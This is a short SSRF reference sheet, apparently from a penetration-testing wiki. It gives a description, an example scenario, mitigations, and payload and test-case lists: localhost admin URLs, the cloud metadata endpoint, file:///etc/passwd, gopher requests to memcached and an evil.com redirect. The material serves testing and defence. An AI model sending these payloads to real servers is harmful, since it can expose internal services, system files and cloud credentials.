# SSRF

**Description:**\
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external network resources on behalf of the server. This can lead to unauthorized access to internal services, data exfiltration, and potential network enumeration.

**Example with Scenario:**\
Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can provide a URL pointing to an internal service, such as `http://localhost/admin`, allowing the attacker to access internal resources.

**Payloads:**

1. **Access Internal Services:**

   ```http
   http://localhost/admin
   http://127.0.0.1/admin
   http://internal-service.local/admin
   ```
2. **Access Metadata Services (Cloud environments):**

   <pre class="language-http"><code class="lang-http"><strong>http://169.254.169.254/latest/meta-data/
   </strong>http://169.254.169.254/computeMetadata/v1/
   </code></pre>
3. **Open Redirect Exploitation:**

   ```http
   http://example.com/?url=http://evil.com
   ```
4. **File Inclusion:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/system32/drivers/etc/hosts
   ```
5. **Protocol Smuggling:**

   ```http
   gopher://localhost:11211/_stats
   ftp://ftp.example.com/file.txt
   ```
6. **DNS Rebinding:**

   ```http
   http://malicious.com (which resolves to an internal IP after initial DNS resolution)
   ```

**Test Cases:**

1. **Basic Internal Access:**

   ```http
   http://localhost:80
   http://127.0.0.1:8080
   ```
2. **Private IP Ranges:**

   ```http
   http://192.168.1.1:80
   http://10.0.0.1:8080
   ```
3. **Accessing Metadata Services:**

   ```http
   http://169.254.169.254/latest/meta-data/
   ```
4. **File Access:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/System32/drivers/etc/hosts
   ```
5. **Alternative Protocols:**

   ```http
   ftp://example.com/file.txt
   gopher://localhost:11211/_stats
   ```
6. **Custom Headers:**

   ```http
   http://example.com -H 'Host: internal-service.local'
   ```

**Mitigation:**

1. **Input Validation and Whitelisting:**
   * Validate and sanitize user inputs. Only allow URLs that match a strict whitelist of allowed domains and protocols.
2. **Disable Unnecessary Protocols:**
   * Restrict the application from using protocols other than HTTP/HTTPS.
3. **Network Segmentation:**
   * Ensure the server cannot access internal services or sensitive resources directly.
4. **Metadata Service Protection:**
   * In cloud environments, limit access to metadata services through firewall rules or IAM roles.
5. **Use a URL Parsing Library:**
   * Use a robust URL parsing library to handle URL validation and prevent bypasses using encoding or other tricks.
6. **Timeouts and Retries:**
   * Implement timeouts and retry limits on server-side requests to avoid exploitation of long-running requests.
7. **Monitor and Alert:**
   * Set up monitoring and alerting for unusual server-side request patterns.